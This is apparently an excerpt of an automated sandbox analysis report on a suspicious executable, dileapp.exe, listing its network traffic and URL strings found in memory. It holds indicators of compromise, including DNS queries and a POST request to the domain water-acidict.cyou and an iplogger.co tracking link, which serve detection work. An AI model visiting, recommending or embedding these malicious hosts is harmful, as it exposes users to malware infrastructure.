                Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficDNS traffic detected: DNS query: iplogger.co
                Source: global trafficDNS traffic detected: DNS query: water-acidict.cyou
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: water-acidict.cyou
                Source: dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: dileapp.exe, 00000005.00000003.1740124665.00000000015BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: dileapp.exe, 0000000C.00000002.2052375189.0000000001B09000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132397400.0000000000F45000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133194684.0000000000F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: dileapp.exe, 0000000C.00000003.2050815274.0000000001B06000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1926780706.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954874686.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1952649413.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050545971.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1980367222.0000000001AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftu
                Source: dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: dileapp.exe, 00000009.00000003.1862666333.0000000005823000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954995924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: dileapp.exe, 00000009.00000003.1862666333.0000000005823000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954995924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133194684.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: dileapp.exe, 00000009.00000003.1862666333.0000000005823000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954995924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: dileapp.exe, 0000000F.00000003.2132165164.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133194684.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOY
                Source: dileapp.exe, 00000009.00000003.1862666333.0000000005823000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954995924.000000000601B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: dileapp.exe, 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: dileapp.exe, 00000009.00000003.1812600714.0000000005864000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1812680278.0000000005806000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901988721.0000000006062000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000006006000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005C16000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984241620.0000000005C70000.00000004.00000800.00020000.00000000.sdmp, s.bat.0.drString found in binary or memory: https://iplogger.co/1tJFB4
                Source: dileapp.exe, 00000009.00000003.1812680278.00000000057E2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000005FE2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/1tJFB41tJFB4
                Source: dileapp.exe, 00000009.00000003.1812680278.0000000005801000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1812600714.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901988721.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000006001000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984241620.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iplogger.co/https://iplogger.co/1tJFB4iplogger.co/1tJFB4
                Source: dileapp.exe, 00000009.00000003.1812600714.0000000005864000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901988721.0000000006062000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984241620.0000000005C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.micro
                Source: dileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: dileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: dileapp.exe, 00000009.00000003.1812600714.0000000005864000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1812680278.0000000005806000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901988721.0000000006062000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000006006000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005C16000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984241620.0000000005C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: dileapp.exe, 00000009.00000003.1812680278.00000000057E2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000005FE2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: dileapp.exe, 00000009.00000003.1812600714.0000000005864000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1812680278.0000000005806000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901988721.0000000006062000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000006006000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005C16000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984241620.0000000005C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: dileapp.exe, 00000009.00000003.1812680278.00000000057E2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000005FE2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: dileapp.exe, 00000005.00000002.1749293398.00000000015C2000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000003.1740124665.00000000015C2000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1970391801.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969486720.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1888884625.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1968959051.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1888558428.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811421821.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1927382793.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1951791615.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052600366.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1926780706.0000000001B11000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2055278689.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1980496225.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2045066427.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1952787217.0000000006035000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050815274.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1980677857.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1980367222.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050916966.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/
                Source: dileapp.exe, 0000000F.00000003.2124178934.0000000000F6C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2124130973.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/#
                Source: dileapp.exe, 0000000C.00000003.2050815274.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/P
